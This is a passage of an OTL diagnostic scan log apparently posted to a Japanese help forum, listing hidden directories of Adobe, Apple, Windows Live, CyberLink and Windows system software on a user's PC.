[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\cs_CZ
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\da_DK
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\de_DE
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\en_US
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\es_ES
[2012/06/20 12:06:56 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\eu_ES
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\fi_FI
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\fr_FR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\hr_HR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\hu_HU
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\it_IT
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ja_JP
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ko_KR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\nb_NO
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\nl_NL
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\pl_PL
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\pt_BR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ro_RO
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\ru_RU
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\sk_SK
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\sl_SI
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\sv_SE
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\tr_TR
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\uk_UA
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\zh_CN
[2012/06/20 12:06:31 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Adobe\HelpCfg\zh_TW
  • あすとろ
  • 2015/09/15 (Tue) 12:00:04
OTL3
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\ColorSync.resources
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CoreGraphics.resources
[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\Foundation.resources
[2015/02/04 08:11:07 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaAccessibility.resources
[2015/02/04 08:11:07 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaToolbox.resources
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ar.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ca.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\cs.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\da.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\de.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\el.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\English.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\en_GB.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\es.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\fi.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\fr.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\he.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\hr.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\hu.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\id.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\it.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ja.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ko.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ms.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\nb.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\nl.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\pl.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\pt.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\pt_PT.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ro.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\ru.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\sk.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\sv.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\th.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\tr.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\uk.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\vi.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\zh_CN.lproj
[2015/02/04 08:10:57 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\AVFoundationCF.resources\zh_TW.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ar.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ca.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\cs.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\da.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\de.lproj
[2014/04/07 23:16:59 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\el.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\English.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\es.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\fi.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\fr.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\he.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\hr.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\hu.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\id.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\it.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ko.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ms.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\nb.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\nl.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\pl.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\pt.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\pt_PT.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ro.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\ru.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\sk.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\sv.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\th.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\tr.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\uk.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\vi.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\zh_CN.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CFNetwork.resources\zh_TW.lproj
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\ColorSync.resources\Profiles
[2014/04/07 23:17:00 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\CoreFoundation.resources\en.lproj
[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\Foundation.resources\en.lproj
[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaAccessibility.resources\en.lproj
[2014/04/07 23:17:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\MediaAccessibility.resources\en_GB.lproj
[2015/02/04 08:11:56 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.IE.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.MobileSync.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Outlook.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Safari.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsContacts.client.resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsMail.client.resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServicesUI.Resources
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.IE.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Outlook.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.Safari.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsContacts.client.resources\English.lproj
[2014/04/07 23:17:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\com.apple.WindowsMail.client.resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Outlook.syncschema
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Bookmarks.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Bookmarks.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Calendars.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Calendars.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Contacts.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Contacts.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema\Contents
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\iCal.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema\Contents
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\MailAccounts.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Notes.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Notes.syncschema\Contents\Resources\English.lproj
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Outlook.syncschema\Contents
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServices\Schemas\Outlook.syncschema\Contents\Resources
[2014/04/07 23:17:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServicesUI.Resources\English.lproj
[2014/07/11 01:11:14 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\EAInstaller\PlantsvsZombies
[2013/08/08 09:41:36 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Intel Corporation\IAStorUtil
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\TextConv
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\Triedit
[2010/11/21 16:25:34 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\ink\HWRCustomization
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\TextConv\ja-JP
[2010/11/21 16:14:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\microsoft shared\Triedit\ja-JP
[2012/06/20 12:00:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e4074ef21cd4e900a
[2012/06/20 12:00:48 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e4f2f72d1cd4e900e
[2012/06/20 12:00:49 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e57d06fd1cd4e9010
[2012/06/20 12:00:51 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e6a692ff1cd4e9015
[2012/06/20 12:00:53 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e7ac6a5d1cd4e9017
[2012/06/20 12:00:54 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\e84e47f01cd4e9019
[2012/06/20 12:00:58 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\eab46af71cd4e901c
[2012/06/20 12:01:01 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\eca127d01cd4e9020
[2012/06/20 12:01:04 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\ee1ba29b1cd4e9023
[2012/06/20 12:01:08 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f0926f441cd4e9025
[2012/06/20 12:01:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f1f0598c1cd4e9027
[2012/06/20 12:01:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f23300141cd4e9029
[2012/06/20 12:01:11 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f2a07f601cd4e902b
[2012/06/20 12:01:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f376bb391cd4e902d
[2012/06/20 12:01:13 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f3d853a41cd4e9030
[2012/06/20 12:01:14 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f41898cc1cd4e9031
[2012/06/20 12:01:15 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f4cfe2c11cd4e9034
[2012/06/20 12:01:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f59a37b81cd4e9036
[2012/06/20 12:01:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f5fe31831cd4e9038
[2012/06/20 12:01:18 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f6e9d9bf1cd4e903a
[2012/06/20 12:01:18 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f701a7811cd4e903c
[2012/06/20 12:01:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f73143071cd4e903e
[2012/06/20 12:01:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Common Files\Windows Live\.cache\f74b722a1cd4e9040
[2012/06/20 12:13:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Chs\images
[2012/06/20 12:13:16 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Cht\images
[2012/06/20 12:13:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Csy\images
[2012/06/20 12:13:17 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Dan\images
[2012/06/20 12:13:18 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Deu\images
[2012/06/20 12:13:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Ell\images
[2012/06/20 12:13:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Enu\images
[2012/06/20 12:13:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Esp\images
[2012/06/20 12:13:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Fin\images
[2012/06/20 12:13:21 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Fra\images
[2012/06/20 12:13:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Hun\images
[2012/06/20 12:13:22 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Ita\images
[2012/06/20 12:13:23 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Jpn\images
[2012/06/20 12:13:24 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Kor\images
[2012/06/20 12:13:24 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Nld\images
[2012/06/20 12:13:25 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Nor\images
[2012/06/20 12:13:26 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\CyberLink\MediaEspresso\Custom\Lang\Plk\images
[2015/08/24 15:09:30 | 000,000,000 | -H-D | M] -- C:\ProgramData\Apple Computer\iTunes\SC Info
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\ProgramData\Microsoft\WwanSvc
[2010/11/21 16:25:02 | 000,000,000 | RH-D | M] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tablet PC
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\ProgramData\Microsoft\WwanSvc\Profiles
[2014/04/01 21:29:29 | 000,000,000 | RH-D | M] -- C:\Users\Default
[2015/08/24 15:09:30 | 000,000,000 | -H-D | M] -- C:\Users\All Users\Apple Computer\iTunes\SC Info
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\Users\All Users\Microsoft\WwanSvc
[2010/11/21 16:25:02 | 000,000,000 | RH-D | M] -- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Tablet PC
[2009/07/14 14:32:38 | 000,000,000 | -H-D | M] -- C:\Users\All Users\Microsoft\WwanSvc\Profiles
[2009/07/14 12:20:08 | 000,000,000 | -H-D | M] -- C:\Users\Default\AppData
[2014/04/01 21:29:34 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData
[2014/04/09 23:21:59 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Device Metadata\dmrccache\downloads
[2014/04/01 21:31:40 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~
[2015/02/13 17:57:57 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~
[2015/01/09 07:31:54 | 000,000,000 | -H-D | M] -- C:\Users\【ユーザー名】\AppData\Local\Microsoft\Media Player\アート キャッシュ
